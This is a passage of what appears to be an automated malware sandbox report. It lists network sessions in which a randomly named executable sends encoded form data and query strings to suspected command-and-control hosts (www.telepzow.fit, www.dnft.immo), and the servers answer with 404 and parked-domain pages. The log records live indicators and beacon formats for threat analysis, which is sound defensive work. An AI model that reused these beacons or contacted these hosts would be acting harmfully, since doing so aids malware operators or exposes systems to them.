                                                        Date: Tue, 10 Dec 2024 17:48:57 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nw9AzNricR9S9HnW0Vp2n74qEIfLP4sy8XcFWeC5DG27sL4iTUYIiXNt9XAICejIs6nTp8jfHMlU7iotzNcDkYJKrt0Y1bhoeqtsl58du%2FENfhg0NPXWk8eGJYrJzDB3QlGS"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff119ad837ebbd-YYZ
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=143156&min_rtt=143156&rtt_var=71578&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=705&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a
                                                        Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
                                                        Dec 10, 2024 18:48:57.993618011 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        6192.168.11.2049761104.21.64.208807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:00.157560110 CET725OUTPOST /oizn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.telepzow.fit
                                                        Origin: http://www.telepzow.fit
                                                        Referer: http://www.telepzow.fit/oizn/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 62 6c 75 41 76 67 64 4c 52 6b 59 4f 65 49 78 76 4f 4b 47 59 63 42 6b 55 4c 48 36 72 38 55 45 51 44 6b 7a 42 72 37 47 48 31 63 57 65 47 47 70 4a 72 4e 4a 2b 74 38 63 35 72 47 72 64 63 32 6c 49 44 6c 44 44 57 32 42 54 51 59 4d 67 32 4b 6b 4a 47 71 70 74 5a 7a 44 44 51 76 79 34 44 53 4e 33 7a 4a 4d 70 4a 6b 4c 42 46 61 76 58 49 4d 38 67 36 68 34 70 38 52 6d 4b 78 65 39 48 48 50 58 30 43 74 51 58 38 73 57 59 4d 71 6c 4f 2b 76 77 31 51 71 6c 52 49 32 61 4c 2b 50 4a 72 63 78 69 32 7a 31 4b 59 4c 6e 53 49 33 49 61 6d 65 39 56 6b 58 48 6f 57 6f 35 4f 56 66 48 79 67 78 36 41 70 6b 52 51 6b 39 43 65 7a 43 30 3d
                                                        Data Ascii: QT=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8UEQDkzBr7GH1cWeGGpJrNJ+t8c5rGrdc2lIDlDDW2BTQYMg2KkJGqptZzDDQvy4DSN3zJMpJkLBFavXIM8g6h4p8RmKxe9HHPX0CtQX8sWYMqlO+vw1QqlRI2aL+PJrcxi2z1KYLnSI3Iame9VkXHoWo5OVfHygx6ApkRQk9CezC0=
                                                        Dec 10, 2024 18:49:00.644364119 CET916INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:00 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3pm5Y0CHbBeIGgtWgHYDtlH720KCwconnEncyLjZHcqIbinvD7zmNbOpDrALMyLTRlXYf2perzsnXdrdq1DACbBz9Ty0zd93zwC%2BBE53uG1kYI8Rw%2FdnYxYlFWOKUj2OvSA"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff11acded5d755-NRT
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=277463&min_rtt=277463&rtt_var=138731&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=725&delivery_rate=0&cwnd=40&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a
                                                        Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
                                                        Dec 10, 2024 18:49:00.644411087 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        7192.168.11.2049762104.21.64.208807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:02.834871054 CET6445OUTPOST /oizn/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 7367
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.telepzow.fit
                                                        Origin: http://www.telepzow.fit
                                                        Referer: http://www.telepzow.fit/oizn/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 6a 53 4c 4c 7a 55 6f 31 4e 74 6b 6f 35 62 6c 75 41 76 67 64 4c 52 6b 59 4f 65 49 78 76 4f 4b 47 59 63 42 6b 55 4c 48 36 72 38 63 45 51 57 77 7a 41 4a 54 47 47 31 63 57 41 57 47 30 4a 72 4e 59 2b 74 6b 59 35 72 36 37 64 65 4f 6c 4b 6d 78 44 47 6e 32 42 63 51 59 4d 76 57 4c 44 4e 47 72 39 74 5a 6a 48 44 51 2f 79 34 44 53 4e 33 31 4e 4d 75 59 6b 4c 4e 6c 61 73 51 49 4d 6f 6b 36 67 32 70 38 4a 32 4b 78 53 74 45 33 76 58 31 69 39 51 48 61 77 57 46 63 71 6a 4e 2b 75 6a 31 51 6d 6d 52 4d 65 34 4c 2b 36 53 72 66 52 69 6c 56 6f 47 4d 59 66 62 64 33 34 69 6a 4e 4a 39 71 58 43 36 65 34 78 52 54 2f 69 66 2b 46 71 6f 67 57 68 67 34 59 61 56 6e 48 32 4a 54 45 7a 45 51 4a 70 74 65 41 69 61 68 34 72 33 68 79 67 6a 44 6a 38 68 65 74 6c 54 48 54 36 41 4b 79 46 39 4f 62 6e 45 6f 79 49 6b 78 43 61 76 31 66 5a 52 2b 30 42 52 50 6b 43 53 4f 70 79 38 34 47 4a 30 4f 48 63 55 44 50 54 44 6e 53 52 52 56 69 59 77 51 4f 2b 5a 6c 56 55 45 56 52 76 72 6c 64 39 49 79 57 57 75 78 73 7a 44 61 79 39 52 56 5a 68 43 30 38 44 [TRUNCATED]
                                                        Data Ascii: QT=jSLLzUo1Ntko5bluAvgdLRkYOeIxvOKGYcBkULH6r8cEQWwzAJTGG1cWAWG0JrNY+tkY5r67deOlKmxDGn2BcQYMvWLDNGr9tZjHDQ/y4DSN31NMuYkLNlasQIMok6g2p8J2KxStE3vX1i9QHawWFcqjN+uj1QmmRMe4L+6SrfRilVoGMYfbd34ijNJ9qXC6e4xRT/if+FqogWhg4YaVnH2JTEzEQJpteAiah4r3hygjDj8hetlTHT6AKyF9ObnEoyIkxCav1fZR+0BRPkCSOpy84GJ0OHcUDPTDnSRRViYwQO+ZlVUEVRvrld9IyWWuxszDay9RVZhC08Dr2l+fkr8HHS0wllRxJu0IUauvlvY5ddSVkVtlgQsTETnceixFUzaZsj3p5zxPwL668ahpZiwd70WN0q4FmvX3IK1FFx3aqizYks9zt/5e1Dl+WVJF7GgE6hJWq8H8KPYhmWaXNnUIs+pCnJgDavlzIEhbN0maOQX5gif8sAdtbM1qJzPer9kk0ftSqxMK3fcmeqcREcjAQAcYEyP8P5gG6m7/pvgfs6Ks5b8yylyGBq1619efHGOyEOoYlpGponGERHUs6JM6InFhQNng/KV6Ig4EBoeeQxCZqU0PQDBv9VJ76TRVZ3hG8kh2ObZUD1CY3xf4ZaWZuL5tpwj5e3BvbgNmErZfdCGE4MgIrffjhJhEBzJshq5e8CftPMEZFkkdxxnYgDYM3cl3tkqdsP/UJkgNMtNXgmeVP42VLDVX+M8dyUt5R4Kez8e60VU/kVlOEgTuMljU10dkmdF6Fr3ZyvrqOUdEK8fL76iWdMgQ5ITbelYf1nzw2BV260m5yaRhoTLcKD71Kjh5ecNdU0lscOwwsL+ludefRdn2u70GHD+wpRY0rYWz+RBPlPutqZHYtHQte2r7Y2kd28Zq1wmoO6ImkHTTcIw5tWo+5sxQGN+4a2yGBUj5xQcHMTl8qpmhHMVqg3UpTaOriTnmVwzSIf1Eu/aap9jLV [TRUNCATED]
                                                        Dec 10, 2024 18:49:02.834920883 CET1429OUTData Raw: 37 6c 44 67 47 74 2b 48 79 4f 53 57 69 4b 6f 6c 75 79 66 6d 58 54 4e 30 42 44 4c 78 61 78 2b 46 79 33 69 76 37 74 53 59 74 41 70 6f 57 58 68 49 32 61 62 54 56 77 54 67 43 52 78 62 7a 59 57 38 74 43 75 64 54 74 56 32 73 39 53 4b 63 33 37 4e 31 6a
                                                        Data Ascii: 7lDgGt+HyOSWiKoluyfmXTN0BDLxax+Fy3iv7tSYtApoWXhI2abTVwTgCRxbzYW8tCudTtV2s9SKc37N1jUKOZzjY05LJUP8AZ7vKkdilKjlpw6aacvxRTMp5tiTeHGJRriDKJ6SaDfXU+QkycQFtZlqwHdbY/RK8rqeloMbv/Z32set3LuWMsuFRgDp2Z2M+XsMfKgHwFm3NfFh7L7hlCad+8ITRw7TPHlcv+1d/eOaxhvQPmN
                                                        Dec 10, 2024 18:49:03.537161112 CET928INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:03 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rjbblhRlSXwaxKyCABD1MxWA%2FCC%2B7w%2BR9%2FGXd4NbKs%2BrjiKy162%2FdBoUSm7uWKmt5jeKXEPLJigHMHox0Kra498nLInCTks4dp3pdPD2FldTTXQ6Pzw%2FNwxFV1V%2BAF11Vf8B"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff11bd2bd4a24a-YYZ
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=142822&min_rtt=142822&rtt_var=71411&sent=6&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7874&delivery_rate=0&cwnd=78&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 37 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 fa 86 7a 46 e6 7a 46 c8 4a f4 61 86 ea 43 1d 04 00 0f b7 8e 79 99 00 00 00 0d 0a
                                                        Data Ascii: 74(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyzFzFJaCy
                                                        Dec 10, 2024 18:49:03.537204981 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        8192.168.11.2049763104.21.64.208807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:05.556551933 CET442OUTGET /oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        Host: www.telepzow.fit
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Dec 10, 2024 18:49:06.151998997 CET940INHTTP/1.1 404 Not Found
                                                        Date: Tue, 10 Dec 2024 17:49:06 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=clEowAA6yD3UC5pVr53RZJzp%2F9U8AwE0MIOttb6%2BJ291iABAoFtw4sXjXr%2FhymTjtdiCo%2FNfBcbBod8JelC%2FP8%2F6BFjT3A5q%2BLbxmslRgQH4%2FM8Q9QarMlQqgrJv9VDRvfLU"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8eff11ce49d06ac1-SEA
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=182025&min_rtt=182025&rtt_var=91012&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=442&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                        Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.27.2</center></body></html>
                                                        Dec 10, 2024 18:49:06.152045965 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.11.2049764199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:11.544217110 CET696OUTPOST /yeky/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 199
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.dnft.immo
                                                        Origin: http://www.dnft.immo
                                                        Referer: http://www.dnft.immo/yeky/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 78 55 41 74 38 4a 4f 72 41 66 76 7a 62 59 77 63 52 6e 59 69 55 54 69 68 7a 64 73 31 50 4d 74 57 6d 74 5a 51 62 42 55 65 6e 79 39 51 78 43 30 2f 77 6a 70 6e 4d 6e 66 45 51 51 45 6d 73 70 4c 6f 54 59 4d 79 55 4d 32 49 46 31 75 36 4e 70 63 69 57 44 39 5a 49 37 43 69 63 48 67 72 34 76 44 61 52 43 6d 4f 54 48 58 49 59 6d 30 39 62 76 2b 58 43 37 35 32 35 6e 70 35 30 44 5a 76 50 31 6c 71 36 2b 45 4d 4a 76 51 63 47 4f 73 4c 69 6c 2b 4e 52 77 49 33 69 33 6c 57 63 55 78 4b 49 73 6d 6f 6e 4f 4f 61 55 51 6f 35 62 6d 4f 32 2f 43 2f 46 32 6b 33 42 4a 51 3d 3d
                                                        Data Ascii: QT=2NeWI1jcYlDHxUAt8JOrAfvzbYwcRnYiUTihzds1PMtWmtZQbBUeny9QxC0/wjpnMnfEQQEmspLoTYMyUM2IF1u6NpciWD9ZI7CicHgr4vDaRCmOTHXIYm09bv+XC7525np50DZvP1lq6+EMJvQcGOsLil+NRwI3i3lWcUxKIsmonOOaUQo5bmO2/C/F2k3BJQ==
                                                        Dec 10, 2024 18:49:11.680057049 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:11 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1106
                                                        x-request-id: fff17439-0e23-4000-bdbb-76b451c22cde
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                        set-cookie: parking_session=fff17439-0e23-4000-bdbb-76b451c22cde; expires=Tue, 10 Dec 2024 18:04:11 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                        Dec 10, 2024 18:49:11.680104971 CET506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZmZmMTc0MzktMGUyMy00MDAwLWJkYmItNzZiNDUxYzIyY2RlIiwicGFnZV90aW1lIjoxNzMzODUyOTUxLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZG5mdC5pbW1vL3lla3k


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.11.2049765199.59.243.227807508C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 10, 2024 18:49:14.241945028 CET716OUTPOST /yeky/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Content-Length: 219
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Cache-Control: no-cache
                                                        Host: www.dnft.immo
                                                        Origin: http://www.dnft.immo
                                                        Referer: http://www.dnft.immo/yeky/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                        Data Raw: 51 54 3d 32 4e 65 57 49 31 6a 63 59 6c 44 48 7a 31 77 74 77 4b 32 72 56 76 76 77 52 34 77 63 66 48 59 63 55 53 65 68 7a 63 6f 62 50 65 4a 57 6d 4d 70 51 61 45 6f 65 67 79 39 51 2b 69 30 41 76 7a 6f 6c 4d 67 58 36 51 53 41 6d 73 6f 72 6f 54 63 49 79 58 37 61 58 48 6c 75 38 57 35 63 61 59 6a 39 5a 49 37 43 69 63 48 31 38 34 72 76 61 52 79 57 4f 54 6b 50 4a 55 47 30 2b 54 50 2b 58 51 4c 35 36 35 6e 70 58 30 43 46 56 50 7a 68 71 36 37 34 4d 51 62 38 44 4d 4f 73 42 6d 6c 2f 49 53 69 4e 65 6b 6a 4a 64 58 6b 67 5a 50 4a 65 6f 72 34 44 41 4a 69 63 64 59 31 53 45 37 79 47 74 30 6d 32 61 55 55 4d 57 37 55 73 4c 44 67 67 6e 6d 70 4c 54 68 2f 33 53 44 62 30 3d
                                                        Data Ascii: QT=2NeWI1jcYlDHz1wtwK2rVvvwR4wcfHYcUSehzcobPeJWmMpQaEoegy9Q+i0AvzolMgX6QSAmsoroTcIyX7aXHlu8W5caYj9ZI7CicH184rvaRyWOTkPJUG0+TP+XQL565npX0CFVPzhq674MQb8DMOsBml/ISiNekjJdXkgZPJeor4DAJicdY1SE7yGt0m2aUUMW7UsLDggnmpLTh/3SDb0=
                                                        Dec 10, 2024 18:49:14.391386032 CET1289INHTTP/1.1 200 OK
                                                        date: Tue, 10 Dec 2024 17:49:13 GMT
                                                        content-type: text/html; charset=utf-8
                                                        content-length: 1106
                                                        x-request-id: 4053eb4c-8b5c-4f4e-a3bf-a64180e203ed
                                                        cache-control: no-store, max-age=0
                                                        accept-ch: sec-ch-prefers-color-scheme
                                                        critical-ch: sec-ch-prefers-color-scheme
                                                        vary: sec-ch-prefers-color-scheme
                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==
                                                        set-cookie: parking_session=4053eb4c-8b5c-4f4e-a3bf-a64180e203ed; expires=Tue, 10 Dec 2024 18:04:14 GMT; path=/
                                                        connection: close
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 4e 31 30 38 47 43 78 4e 35 48 53 45 6f 4b 4a 66 2b 55 75 69 52 41 57 61 50 37 63 64 6d 61 6e 64 70 73 7a 6c 78 35 53 41 75 7a 44 75 78 70 67 47 57 67 76 36 45 38 54 43 54 74 4c 59 30 47 72 66 35 34 6c 77 75 4a 4a 74 30 75 57 31 2b 30 51 67 2f 74 49 36 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zN108GCxN5HSEoKJf+UuiRAWaP7cdmandpszlx5SAuzDuxpgGWgv6E8TCTtLY0Grf54lwuJJt0uW1+0Qg/tI6w==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
